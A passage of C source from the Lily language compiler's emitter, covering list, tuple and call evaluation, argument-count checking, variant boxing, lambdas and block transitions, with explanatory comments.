right->result->type); if (ret) emit_rebox_value(emit, want_type, right); } else ret = 0; return ret; } /* eval_build_list This writes an instruction to build a list from a set of values given. If all list elements have the same type, the resulting list shall be of the common type (Ex: [1, 2, 3] is a list[integer]). If they do not, the resulting type shall be list[any]. 
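
   A hypothetical sketch:

       var a = [1, 2, 3]      # list[integer]
       var b = [1, "2", 3.3]  # no common type: values are boxed, list[any]
       list[any] c = [1]      # caller wants list[any]: the 1 is boxed to any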
*/ static void eval_build_list(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_type *elem_type = NULL; lily_ast *arg; int found_variant_or_enum = 0, make_anys = 0; if (expect_type) { if (ast->args_collected == 0) { lily_type *check_type; if (expect_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { check_type = lily_ts_easy_resolve(emit->ts, expect_type); } else check_type = expect_type; if (check_type && check_type->cls->id == SYM_CLASS_HASH) { eval_build_hash(emit, ast, expect_type, 1); return; } } int ok = setup_types_for_build(emit, expect_type, SYM_CLASS_LIST, did_resolve); if (ok) { elem_type = lily_ts_get_ceiling_type(emit->ts, 0); expect_type = elem_type; } } lily_type *last_type = NULL; for (arg = ast->arg_start;arg != NULL;arg = arg->next_arg) { if (arg->tree_type != tree_local_var) eval_tree(emit, arg, elem_type, 1); /* 'any' is marked as an enum class, but this is only interested in user-defined enum classes (which have special defaulting). */ if ((arg->result->type->cls->flags & (CLS_ENUM_CLASS | CLS_VARIANT_CLASS)) && arg->result->type->cls->id != SYM_CLASS_ANY) found_variant_or_enum = 1; if (arg->result->type != last_type) { if (last_type == NULL) last_type = arg->result->type; else make_anys = 1; } } if (elem_type == NULL && last_type == NULL) { /* This happens when there's an empty list and a list is probably not expected. Default to list[any] and hope that's right. */ lily_class *cls = emit->symtab->any_class; elem_type = cls->type; } else if (last_type != NULL) { if (found_variant_or_enum) rebox_enum_variant_values(emit, ast, expect_type, 0); else if (make_anys || (elem_type && elem_type->cls->id == SYM_CLASS_ANY)) emit_list_values_to_anys(emit, ast); /* else all types already match, so nothing to do. */ /* At this point, all list values are guaranteed to have the same type, so this works. */ elem_type = ast->arg_start->result->type; } lily_ts_set_ceiling_type(emit->ts, elem_type, 0); lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, emit->symtab->list_class, 1, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_list_tuple, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* eval_build_tuple This handles creation of a tuple from a series of values. The resulting tuple will have a type that matches what it obtained. <[1, "2", 3.3]> # tuple[integer, string, double] This attempts to do the same sort of defaulting that eval_build_list and eval_build_hash do: tuple[any] t = <[1]> # Becomes tuple[any]. */ static void eval_build_tuple(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_unwrap) { if (ast->args_collected == 0) { lily_raise(emit->raiser, lily_SyntaxError, "Cannot create an empty tuple.\n"); } /* It is not possible to use setup_types_for_build here, because tuple takes N types and subtrees may damage those types. Those types also cannot be hidden, because the expected type may contain generics that the callee may attempt to check the resolution of. Just...don't unwrap things more than once here. 
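
       As a sketch of why that inference matters (hypothetical declaration):

           define f[A](v: tuple[A, string])
           f(<[1, "x"]>)   # the expected tuple's subtypes flow into each
                           # value here, and A is later solved as integer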
*/ if (expect_type && expect_type->cls->id == SYM_CLASS_GENERIC && did_unwrap == 0) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_unwrap = 1; } if (expect_type && (expect_type->cls->id != SYM_CLASS_TUPLE || expect_type->subtype_count != ast->args_collected)) expect_type = NULL; int i; lily_ast *arg; for (i = 0, arg = ast->arg_start; arg != NULL; i++, arg = arg->next_arg) { lily_type *elem_type = NULL; /* It's important to do this for each pass because it allows the inner trees to infer types that this tree's parent may want. */ if (expect_type) { elem_type = expect_type->subtypes[i]; if (did_unwrap == 0 && elem_type && elem_type->cls->id == SYM_CLASS_GENERIC) { elem_type = lily_ts_easy_resolve(emit->ts, elem_type); } } if (arg->tree_type != tree_local_var) eval_tree(emit, arg, elem_type, 1); if (elem_type && elem_type != arg->result->type) /* Attempt to fix the type to what's wanted. If it fails, the parent tree will note a type mismatch. Can't do anything else here though. */ type_matchup(emit, elem_type, arg); } for (i = 0, arg = ast->arg_start; i < ast->args_collected; i++, arg = arg->next_arg) { lily_ts_set_ceiling_type(emit->ts, arg->result->type, i); } lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, emit->symtab->tuple_class, i, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_list_tuple, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* eval_subscript Evaluate a subscript, returning the resulting value. This handles subscripts of list, hash, and tuple. */ static void eval_subscript(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type) { lily_ast *var_ast = ast->arg_start; lily_ast *index_ast = var_ast->next_arg; if (var_ast->tree_type != tree_local_var) eval_tree(emit, var_ast, NULL, 1); if (index_ast->tree_type != tree_local_var) eval_tree(emit, index_ast, NULL, 1); check_valid_subscript(emit, var_ast, index_ast); lily_type *type_for_result; type_for_result = get_subscript_result(var_ast->result->type, index_ast); lily_storage *result = get_storage(emit, type_for_result); write_5(emit, o_get_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, result->reg_spot); if (var_ast->result->flags & SYM_NOT_ASSIGNABLE) result->flags |= SYM_NOT_ASSIGNABLE; ast->result = (lily_sym *)result; } /******************************************************************************/ /* Call handling */ /******************************************************************************/ /* Function calls are rather complex things, and so they have everything under this area. To begin with, Lily supports the following kinds of calls: * x() # This is a simple call. * x.y() # x is an instance of some class. y is either a property of the # class, or a class method. 'x' is added as the first argument # of the call. * {|| 10} () # A call of a lambda. Weird, but okay. * x[0]() # A call of a subscript result. * x()() # A call of a call result. enum class Option[A] { Some(A), None } * x = Some(10) # A 'call' of a variant type. eval_variant handles writing out # the code, but the arguments given pass through the same type # checking that a regular call's arguments pass through. Calls are also the backbone of type inference. The arguments they expect are passed down to evaluated trees. List, hash, and tuple eval all use the types that are given to infer what they can. However, calls also need to infer a a little bit. 
One example is that if a call wants type any, but a non-any is supplied, it will 'rebox' the non-any into an any. Finally, calls must keep track of their arguments. This is kept track of using a min and a max. Most functions take a set number of arguments, and min will be the same as max. However, min is less than max for functions that have optional arguments. Max is set to -1 for functions that take varargs. It is currently not possible for a function to be both optargs and varargs. */ static void add_call_state(lily_emit_state *emit) { lily_emit_call_state *new_state = lily_malloc(sizeof(lily_emit_call_state)); if (emit->call_state != NULL) emit->call_state->next = new_state; new_state->prev = emit->call_state; new_state->next = NULL; new_state->item = NULL; new_state->call_type = NULL; emit->call_state = new_state; } static void grow_call_values(lily_emit_state *emit) { emit->call_values_size *= 2; emit->call_values = lily_realloc(emit->call_values, sizeof(lily_sym *) * emit->call_values_size); } static void add_value(lily_emit_state *emit, lily_emit_call_state *cs, lily_sym *sym) { if (emit->call_values_pos == emit->call_values_size) grow_call_values(emit); emit->call_values[emit->call_values_pos] = sym; emit->call_values_pos++; cs->arg_count++; } static lily_type *get_expected_type(lily_emit_call_state *cs, int pos) { lily_type *result; if (cs->vararg_start > (pos + 1)) { /* The + 1 is because the return type of a function is the first subtype inside of it. */ result = cs->call_type->subtypes[pos + 1]; if (result->cls->id == SYM_CLASS_OPTARG) result = result->subtypes[0]; } else { /* There's no check for optarg here because there's no such thing as varargs with optional values. */ result = cs->vararg_elem_type; } return result; } static void condense_args(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *type, uint16_t from, uint16_t to) { int i; int offset = (emit->call_values_pos - cs->arg_count) + from; int count = to - from; lily_storage *s = get_storage(emit, type); write_prep(emit, 4 + count); emit->code[emit->code_pos] = o_build_list_tuple; emit->code[emit->code_pos + 1] = cs->ast->line_num; emit->code[emit->code_pos + 2] = count; for (i = 0;i < count;i++) emit->code[emit->code_pos + 3 + i] = emit->call_values[offset + i]->reg_spot; /* The individual extra values are gone now... */ emit->call_values_pos -= count; cs->arg_count -= count; /* With the list of them added in place of it. */ add_value(emit, cs, (lily_sym *)s); emit->code[emit->code_pos + 3 + i] = s->reg_spot; emit->code_pos += 4 + i; } /* eval_call_arg Evaluate the argument of a function call and do some type matching up on the result. This is different than type_matchup, because it's a fair chance that the arguments may hold information about generics. */ static void eval_call_arg(lily_emit_state *emit, lily_emit_call_state *cs, lily_ast *arg) { lily_type *want_type = get_expected_type(cs, cs->arg_count); if (want_type->cls->id == SYM_CLASS_OPTARG) want_type = want_type->subtypes[0]; if (arg->tree_type != tree_local_var) /* Calls fill in their type info as they go along, courteousy of their arguments. So the types are NEVER resolved. */ eval_tree(emit, arg, want_type, 0); /* This is used so that type_matchup gets the resolved type (if there is one) because the resolved type might be 'any'. */ lily_type *matchup_type = want_type; /* Don't allow bare variants to solve for a type. Always force them to be in something to prevent bare variant values. 
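
       For example (hypothetical code, reusing the Option enum shown in the
       comment above):

           define f[A](value: A)
           f(None)    # A must not be solved as the bare variant; None is
                      # first boxed into its enum class (with unknown
                      # generics defaulted), so A becomes an Option type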
*/ if (arg->result->type->cls->flags & CLS_VARIANT_CLASS) { cs->have_bare_variants = 1; if (want_type->cls->id == SYM_CLASS_GENERIC) { matchup_type = lily_ts_easy_resolve(emit->ts, want_type); if (matchup_type == NULL) rebox_variant_to_enum(emit, arg); } } lily_type *match_type = want_type; if (want_type->cls->id == SYM_CLASS_GENERIC) match_type = lily_ts_easy_resolve(emit->ts, want_type); /* ok == 0 protects from potentially attempting to resolve the same generic twice, which breaks things. */ if (lily_ts_check(emit->ts, want_type, arg->result->type) || type_matchup(emit, match_type, arg)) { add_value(emit, cs, arg->result); } else bad_arg_error(emit, cs, arg->result->type, want_type); } /* box_call_variants This function is called when check_call_args is done processing arguments AND the call has been tagged by the symtab as having enum values. This function exists because it's possible for a Lily function to not know what the resulting enum class should be. In such a case, call argument processing calls this to make sure any variants are put into a proper enum class value. */ static void box_call_variants(lily_emit_state *emit, lily_emit_call_state *cs) { int num_args = cs->call_type->subtype_count - 1; int i; lily_sym *sym; int offset = emit->call_values_pos - cs->arg_count; uint32_t line_num = cs->ast->line_num; if (cs->vararg_start != (uint16_t)-1) num_args--; for (i = 0;i != num_args;i++) { sym = emit->call_values[offset + i]; if (sym->type->cls->flags & CLS_VARIANT_CLASS) { lily_type *enum_type = lily_ts_resolve(emit->ts, get_expected_type(cs, i)); sym = (lily_sym *)emit_rebox_sym(emit, enum_type, sym, line_num); emit->call_values[offset + i] = sym; } } if (i != cs->arg_count && cs->vararg_elem_type->cls->flags & CLS_ENUM_CLASS && cs->vararg_elem_type->cls != emit->symtab->any_class) { lily_type *solved_elem_type = lily_ts_resolve(emit->ts, get_expected_type(cs, i)); for (;i != cs->arg_count;i++) { sym = emit->call_values[offset + i]; /* This is called before the varargs are shoved into a list, so looping over the args is fine. Varargs is represented as a list of some type, so this next line grabs the list, then what the list holds. */ if (sym->type->cls->flags & CLS_VARIANT_CLASS) { sym = (lily_sym *)emit_rebox_sym(emit, solved_elem_type, sym, line_num); emit->call_values[offset + i] = sym; } } } } /* verify_argument_count This makes sure that the function being called (specified by 'ast') is being called with the right number of arguments. This is slightly tricky, because of optional arguments and variable arguments. */ static void verify_argument_count(lily_emit_state *emit, lily_emit_call_state *cs, int num_args) { lily_type *call_type = cs->call_type; /* The -1 is because the return type of a function is the first type. */ int args_needed = cs->call_type->subtype_count - 1; unsigned int min = args_needed; unsigned int max = args_needed; /* A function can be either varargs or optargs. They cannot coexist because parser does not allow a default value for varargs, and varargs must always be last. 
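
       A worked sketch: a plain call type with subtypes (return, A, B) gives
       min == max == 2. If B is instead wrapped in an optarg, min drops to 1
       while max stays 2. If the function is varargs, max becomes unlimited
       ((unsigned int)-1) and min becomes args_needed - 1.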
*/ if (call_type->flags & TYPE_HAS_OPTARGS) { int i; for (i = 1;i < call_type->subtype_count;i++) { if (call_type->subtypes[i]->cls->id == SYM_CLASS_OPTARG) break; } min = i - 1; } else if (call_type->flags & TYPE_IS_VARARGS) { max = (unsigned int)-1; min = args_needed - 1; } if (num_args < min || num_args > max) { push_info_to_error(emit, cs); lily_msgbuf *msgbuf = emit->raiser->msgbuf; lily_msgbuf_add(msgbuf, " expects "); if (max == (unsigned int)-1) lily_msgbuf_add_fmt(msgbuf, "at least %d args", min); else if (max > min) lily_msgbuf_add_fmt(msgbuf, "%d to %d args", min, max); else lily_msgbuf_add_fmt(msgbuf, "%d args", min); lily_msgbuf_add_fmt(msgbuf, ", but got %d.\n", num_args); emit->raiser->line_adjust = cs->ast->line_num; lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } } /* check_call_args eval_call uses this to make sure the types of all the arguments are right. If the function takes varargs, the extra arguments are packed into a list of the vararg type. */ static void eval_verify_call_args(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *expect_type, int did_resolve) { lily_ast *ast = cs->ast; int num_args = ast->args_collected; lily_tree_type call_tt = ast->arg_start->tree_type; if (call_tt == tree_defined_func) { /* Do a self insert if the thing being called belongs to this class. */ lily_var *first_result = ((lily_var *)ast->arg_start->sym); if (emit->current_class != NULL && emit->current_class == first_result->parent) { add_value(emit, cs, (lily_sym *)emit->block->self); } else num_args--; } else if (call_tt != tree_oo_access) num_args--; /* ast->args_collected includes the first tree in that count. If the first tree doesn't provide that value, then the argument count must be adjusted. */ verify_argument_count(emit, cs, num_args); /* Since this assumes there is at least one argument needed, it has to come after verifying the argument count. */ if (call_tt == tree_oo_access) { lily_ts_check(emit->ts, get_expected_type(cs, 0), ast->arg_start->arg_start->result->type); /* For x.y kinds of accesses, add the (evaluated) 'x' as the first value. */ add_value(emit, cs, ast->arg_start->arg_start->result); } if (cs->call_type->flags & TYPE_IS_UNRESOLVED) { if (call_tt == tree_local_var || call_tt == tree_inherited_new) { /* This forces each generic to be resolved as itself. (A = A, B = B, etc.). This is really important. tree_local_var: define f[A](a: function (A => A), b: A) If g is called, it can't resolve what A is. It gets that information from f. I call this being 'quasi-solved'. tree_inherited_new: class one[A, B](a: A, b: B) { ... } class two[A, B, C](a: A, b: B, c: C) < one(b, a) # INVALID By forcing 'two' to have the same generic ordering as 'one', Lily greatly simplifies generics handling. The A of one is the A of two. */ lily_ts_resolve_as_self(emit->ts); } else { lily_type *call_result = cs->call_type->subtypes[0]; if (call_result && expect_type && did_resolve) { /* If the caller wants something and the result is that same sort of thing, then fill in info based on what the caller wants. */ if (expect_type->cls->id == call_result->cls->id) { /* The return isn't checked because there will be a more accurate problem that is likely to manifest later. 
*/ lily_ts_check(emit->ts, call_result, expect_type); } else if (expect_type->cls->flags & CLS_ENUM_CLASS && call_result->cls->parent == expect_type->cls) { lily_ts_resolve_as_variant_by_enum(emit->ts, call_result, expect_type); } } } } lily_ast *arg; for (arg = ast->arg_start->next_arg;arg != NULL;arg = arg->next_arg) eval_call_arg(emit, cs, arg); if (cs->have_bare_variants) box_call_variants(emit, cs); if (cs->call_type->flags & TYPE_IS_VARARGS) { int va_pos = cs->call_type->subtype_count - 1; lily_type *vararg_type = cs->call_type->subtypes[va_pos]; if (vararg_type->flags & TYPE_IS_UNRESOLVED) vararg_type = lily_ts_resolve(emit->ts, vararg_type); condense_args(emit, cs, vararg_type, cs->call_type->subtype_count - 2, cs->arg_count); } } static lily_emit_call_state *begin_call(lily_emit_state *emit, lily_ast *ast) { lily_emit_call_state *result = emit->call_state; if (result->next == NULL) add_call_state(emit); emit->call_state = result->next; result->ast = ast; result->arg_count = 0; result->have_bare_variants = 0; lily_ast *first_tree = ast->arg_start; lily_tree_type first_tt = first_tree->tree_type; lily_item *call_item = NULL; lily_item *debug_item = NULL; lily_type *call_type = NULL; if (first_tt == tree_defined_func || first_tt == tree_inherited_new) call_item = ast->arg_start->item; else if (first_tt == tree_oo_access) { eval_oo_access_for_item(emit, ast->arg_start); if (first_tree->item->flags & ITEM_TYPE_PROPERTY) { debug_item = (lily_item *)first_tree->property; oo_property_read(emit, first_tree); call_item = (lily_item *)first_tree->result; } else call_item = first_tree->item; } else if (first_tt != tree_variant) { eval_tree(emit, ast->arg_start, NULL, 1); call_item = (lily_item *)ast->arg_start->result; if (first_tt == tree_upvalue || first_tt == tree_open_upvalue) debug_item = ast->arg_start->item; } else { call_item = (lily_item *)ast->arg_start->variant_class; call_type = ast->arg_start->variant_class->variant_type; } if (debug_item == NULL) debug_item = call_item; if (call_type == NULL) call_type = ((lily_sym *)call_item)->type; if (call_type->cls->id != SYM_CLASS_FUNCTION && first_tt != tree_variant) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Cannot anonymously call resulting type '^T'.\n", call_type); result->item = call_item; result->call_type = call_type; result->error_item = debug_item; if (call_type->flags & TYPE_IS_VARARGS) { /* The vararg type is always the last type in the function. It is represented as a list. The first type of that list is the type that each vararg entry will need to be. 
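
       For example (a sketch): if the call type's last subtype is
       list[string], then vararg_elem_type is string, and every argument
       from vararg_start onward must be (or be made into) a string before
       being condensed into a single list value.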
*/ int va_pos = call_type->subtype_count - 1; result->vararg_elem_type = call_type->subtypes[va_pos]->subtypes[0]; result->vararg_start = va_pos; } else { result->vararg_elem_type = NULL; result->vararg_start = (uint16_t)-1; } return result; } static void write_call(lily_emit_state *emit, lily_emit_call_state *cs) { int offset = emit->call_values_pos - cs->arg_count; lily_sym *call_sym = cs->sym; lily_ast *ast = cs->ast; write_prep(emit, 6 + cs->arg_count); emit->code[emit->code_pos] = o_function_call; emit->code[emit->code_pos+1] = ast->line_num; emit->code[emit->code_pos+2] = !!(call_sym->flags & VAR_IS_READONLY); emit->code[emit->code_pos+3] = call_sym->reg_spot; emit->code[emit->code_pos+4] = cs->arg_count; int i, j; for (i = 5, j = 0;j < cs->arg_count;i++, j++) { emit->code[emit->code_pos + i] = emit->call_values[offset + j]->reg_spot; } if (cs->call_type->subtypes[0] != NULL) { lily_type *return_type = cs->call_type->subtypes[0]; /* If it's just a generic, grab the appropriate thing from the type stack (which is okay until the next eval_call). Otherwise, just give up and build the right thing. */ if (return_type->cls->id == SYM_CLASS_GENERIC) return_type = lily_ts_easy_resolve(emit->ts, return_type); else if (return_type->flags & TYPE_IS_UNRESOLVED) return_type = lily_ts_resolve(emit->ts, return_type); lily_storage *storage = get_storage(emit, return_type); storage->flags |= SYM_NOT_ASSIGNABLE; ast->result = (lily_sym *)storage; emit->code[emit->code_pos+i] = ast->result->reg_spot; } else { /* It's okay to not push a return value, unless something needs it. Assume that if the tree has a parent, something needs a value. */ if (ast->parent == NULL) ast->result = NULL; else { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Function needed to return a value, but did not.\n", ""); } emit->code[emit->code_pos+i] = -1; } emit->code_pos += 6 + cs->arg_count; } static void end_call(lily_emit_state *emit, lily_emit_call_state *cs) { emit->call_values_pos -= cs->arg_count; emit->call_state = cs; } /* eval_call This handles doing calls to what should be a function. */ static void eval_call(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_tree_type first_t = ast->arg_start->tree_type; /* Variants are created by calling them in a function-like manner, so the parser adds them as if they were functions. They're not. */ if (first_t == tree_variant) { eval_variant(emit, ast, expect_type, did_resolve); return; } int saved_ts_adjust = lily_ts_raise_ceiling(emit->ts); lily_emit_call_state *cs; cs = begin_call(emit, ast); eval_verify_call_args(emit, cs, expect_type, did_resolve); write_call(emit, cs); end_call(emit, cs); lily_ts_lower_ceiling(emit->ts, saved_ts_adjust); } /* emit_nonlocal_var This handles vars that are not local and are on the right hand side of an expression. This handles loading both literals and globals into a local register. 
*/ static void emit_nonlocal_var(lily_emit_state *emit, lily_ast *ast) { lily_storage *ret; int opcode; if (ast->tree_type == tree_global_var) opcode = o_get_global; else opcode = o_get_readonly; ret = get_storage(emit, ast->sym->type); if (opcode != o_get_global) ret->flags |= SYM_NOT_ASSIGNABLE; write_4(emit, opcode, ast->line_num, ast->sym->reg_spot, ret->reg_spot); ast->result = (lily_sym *)ret; } static void eval_variant(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_storage *result = NULL; if (ast->tree_type == tree_call) { ast->result = NULL; /* The first arg is actually the variant. */ lily_ast *variant_tree = ast->arg_start; lily_class *variant_class = variant_tree->variant_class; lily_type *variant_type = variant_class->variant_type; /* This is necessary because ast->item is used for retrieving info if there is an error. */ ast->item = (lily_item *)variant_class; if (variant_type->subtype_count == 1) lily_raise(emit->raiser, lily_SyntaxError, "Variant class %s should not get args.\n", variant_class->name); int save_ceiling = lily_ts_raise_ceiling(emit->ts); lily_emit_call_state *cs; cs = begin_call(emit, ast); eval_verify_call_args(emit, cs, expect_type, did_resolve); lily_type *result_type = variant_class->variant_type->subtypes[0]; if (result_type->flags & TYPE_IS_UNRESOLVED) result_type = lily_ts_resolve(emit->ts, result_type); /* This will cause all of the args to be put together in a tuple. The tuple will be put into emit->call_values as the most recent value. */ condense_args(emit, cs, result_type, 0, cs->arg_count); result = (lily_storage *)emit->call_values[emit->call_values_pos - 1]; end_call(emit, cs); lily_ts_lower_ceiling(emit->ts, save_ceiling); } else { /* Did this need arguments? It was used incorrectly if so. */ lily_type *variant_init_type = ast->variant_class->variant_type; if (variant_init_type->subtype_count != 0) lily_raise(emit->raiser, lily_SyntaxError, "Variant class %s needs %d arg(s).\n", ast->variant_class->name, variant_init_type->subtype_count - 1); /* If a variant type takes no arguments, then it's essentially an empty container. It would be rather silly to have a bunch of UNIQUE empty containers (which will always be empty). So the interpreter creates a literal and hands that off. */ lily_type *variant_type = ast->variant_class->variant_type; lily_tie *variant_lit = lily_get_variant_literal(emit->symtab, variant_type); result = get_storage(emit, variant_type); write_4(emit, o_get_readonly, ast->line_num, variant_lit->reg_spot, result->reg_spot); } ast->result = (lily_sym *)result; } static void eval_lambda(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { char *lambda_body = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); if (expect_type && expect_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_resolve = 1; } if (expect_type && expect_type->cls->id != SYM_CLASS_FUNCTION) expect_type = NULL; lily_sym *lambda_result = (lily_sym *)lily_parser_lambda_eval(emit->parser, ast->line_num, lambda_body, expect_type, did_resolve); lily_storage *s = get_storage(emit, lambda_result->type); if (emit->closed_pos) { /* Assume that the lambda uses either upvalues or is inside of a class and uses self. */ close_over_sym(emit, lambda_result); /* This will create a copy of the function (the copy will get a shallow copy of upvalues to use). 
The code transformer will later rewrite the upcoming lambda access to use the upvalue copy. */ write_4(emit, o_create_function, lambda_result->reg_spot, 0, emit->closed_pos - 1); inject_patch_into_block(emit, find_deepest_func(emit), emit->code_pos - 2); write_4(emit, o_get_upvalue, ast->line_num, emit->closed_pos - 1, s->reg_spot); } else { write_4(emit, o_get_readonly, ast->line_num, lambda_result->reg_spot, s->reg_spot); } ast->result = (lily_sym *)s; } void eval_self(lily_emit_state *emit, lily_ast *ast) { ast->result = (lily_sym *)emit->block->self; } void eval_upvalue(lily_emit_state *emit, lily_ast *ast) { lily_sym *sym = ast->sym; int i; for (i = 0;i < emit->closed_pos;i++) if (emit->closed_syms[i] == sym) break; lily_storage *s = get_storage(emit, sym->type); write_4(emit, o_get_upvalue, ast->line_num, i, s->reg_spot); ast->result = (lily_sym *)s; } void eval_open_upvalue(lily_emit_state *emit, lily_ast *ast) { lily_sym *sym = ast->sym; close_over_sym(emit, ast->sym); lily_storage *result = get_storage(emit, sym->type); write_4(emit, o_get_upvalue, ast->line_num, emit->closed_pos - 1, result->reg_spot); ast->result = (lily_sym *)result; } /* eval_tree Magically determine what function actually handles the given ast. */ static void eval_tree(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { if (ast->tree_type == tree_global_var || ast->tree_type == tree_literal || ast->tree_type == tree_defined_func || ast->tree_type == tree_inherited_new) emit_nonlocal_var(emit, ast); else if (ast->tree_type == tree_call) eval_call(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_binary) { if (ast->op >= expr_assign) { lily_tree_type left_tt = ast->left->tree_type; if (left_tt == tree_local_var || left_tt == tree_global_var) eval_assign(emit, ast); else if (left_tt == tree_subscript) eval_sub_assign(emit, ast); else if (left_tt == tree_oo_access) eval_oo_assign(emit, ast); else if (left_tt == tree_property) eval_property_assign(emit, ast); else if (left_tt == tree_upvalue || left_tt == tree_open_upvalue) eval_upvalue_assign(emit, ast); else /* Let eval_assign say that it's wrong. 
*/ eval_assign(emit, ast); assign_post_check(emit, ast); } else if (ast->op == expr_logical_or || ast->op == expr_logical_and) eval_logical_op(emit, ast); else { if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, NULL, 1); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, ast->left->result->type, 1); emit_binary_op(emit, ast); } } else if (ast->tree_type == tree_parenth) { if (ast->arg_start->tree_type != tree_local_var) eval_tree(emit, ast->arg_start, expect_type, 1); ast->result = ast->arg_start->result; } else if (ast->tree_type == tree_unary) { if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, expect_type, 1); eval_unary_op(emit, ast); } else if (ast->tree_type == tree_list) eval_build_list(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_hash) eval_build_hash(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_tuple) eval_build_tuple(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_subscript) eval_subscript(emit, ast, expect_type); else if (ast->tree_type == tree_typecast) eval_typecast(emit, ast); else if (ast->tree_type == tree_oo_access) eval_oo_access(emit, ast); else if (ast->tree_type == tree_property) eval_property(emit, ast); else if (ast->tree_type == tree_variant) eval_variant(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_lambda) eval_lambda(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_self) eval_self(emit, ast); else if (ast->tree_type == tree_upvalue) eval_upvalue(emit, ast); else if (ast->tree_type == tree_open_upvalue) eval_open_upvalue(emit, ast); } /*****************************************************************************/ /* Exported functions */ /*****************************************************************************/ /* lily_emit_change_block_to This is called when the parser would like to change the current block into another block type. One example is when the parser sees 'elif'. In that case, it wants to change the current block into 'BLOCK_IF_ELIF'. */ void lily_emit_change_block_to(lily_emit_state *emit, int new_type) { int current_type = emit->block->block_type; int save_jump; if (new_type == BLOCK_IF_ELIF || new_type == BLOCK_IF_ELSE) { char *block_name; if (new_type == BLOCK_IF_ELIF) block_name = "elif"; else block_name = "else"; if (current_type != BLOCK_IF && current_type != BLOCK_IF_ELIF) lily_raise(emit->raiser, lily_SyntaxError, "'%s' without 'if'.\n", block_name); if (current_type == BLOCK_IF_ELSE) lily_raise(emit->raiser, lily_SyntaxError, "'%s' after 'else'.\n", block_name); lily_var *v = emit->block->var_start; if (v != emit->symtab->active_import->var_chain) lily_hide_block_vars(emit->symtab, v); } else if (new_type == BLOCK_TRY_EXCEPT) { if (current_type != BLOCK_TRY && current_type != BLOCK_TRY_EXCEPT) lily_raise(emit->raiser, lily_SyntaxError, "'except' outside 'try'.\n"); /* If nothing in the 'try' block raises an error, the vm needs to be told to unregister the 'try' block since will become unreachable when the jump below occurs. */ if (current_type == BLOCK_TRY) write_1(emit, o_pop_try); } /* Transitioning between blocks is simple: First write a jump at the end of the current branch. This will get patched to the if/try's exit. */ write_2(emit, o_jump, 0); save_jump = emit->code_pos - 1; /* The last jump of the previous branch wants to know where the check for the next branch starts. It's right now. 
*/ if (emit->patches[emit->patch_pos - 1] != -1) emit->code[emit->patches[emit->patch_pos-1]] = emit->code_pos - emit->block->jump_offset; /* else it's a fake branch from a condition that was optimized out. */ emit->patches[emit->patch_pos-1] = save_jump; emit->block->block_type = new_type; } /* lily_emit_expr This evaluates the root of the ast pool given (the expression), then clears the pool for the next expression. */ void lily_emit_eval_expr(lily_emit_state *emit, lily_ast_pool *ap) { eval_tree(emit, ap->root, NULL, 1); emit->expr_num++; lily_ast_reset_pool(ap); } /* lily_emit_eval_expr_to_var This evaluates the root of the current ast pool, then assigns the result to the given var. This is used for expressions within 'for..in', and thus the var is expected to always be an integer. This clears the ast pool for the next pass. */ void lily_emit_eval_expr_to_var(lily_emit_state *emit, lily_ast_pool *ap, lily_var *var) { lily_ast *ast = ap->root; eval_tree(emit, ast, NULL, 1); emit->expr_num++; if (ast->result->type->cls->id != SYM_CLASS_INTEGER) { lily_raise(emit->raiser, lily_SyntaxError, "Expected type 'integer', but got type '^T'.\n", ast->result->type); } /* Note: This works because the only time this is called is to handle for..in range expressions, which are always integers. */ write_4(emit, o_fast_assign, ast->line_num, ast->result->reg_spot, var->reg_spot); lily_ast_reset_pool(ap); } /* lily_emit_eval_condition This function evaluates an ast that will decide if a block should be entered. This will write o_jump_if_false which will jump to the next branch or outside the block if the ast's result is false. This is suitable for 'if', 'elif', 'while', and 'do...while'. This clears the ast pool for the next pass. */ void lily_emit_eval_condition(lily_emit_state *emit, lily_ast_pool *ap) { lily_ast *ast = ap->root; int current_type = emit->block->block_type; if ((ast->tree_type == tree_literal && condition_optimize_check(ast)) == 0) { eval_enforce_value(emit, ast, NULL, "Conditional expression has no value.\n"); ensure_valid_condition_type(emit, ast->result->type); if (current_type != BLOCK_DO_WHILE) /* If this doesn't work, add a jump which will get fixed to the next branch start or the end of the block. */ emit_jump_if(emit, ast, 0); else { /* In a 'do...while' block, the condition is at the end, so the jump is reversed: If successful, go back to the top, otherwise fall out of the loop. */ write_4(emit, o_jump_if, 1, ast->result->reg_spot, emit->loop_start); } } else { if (current_type != BLOCK_DO_WHILE) { /* Code that handles if/elif/else transitions expects each branch to write a jump. There's no easy way to tell it that none was made... so give it a fake jump. */ if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = -1; 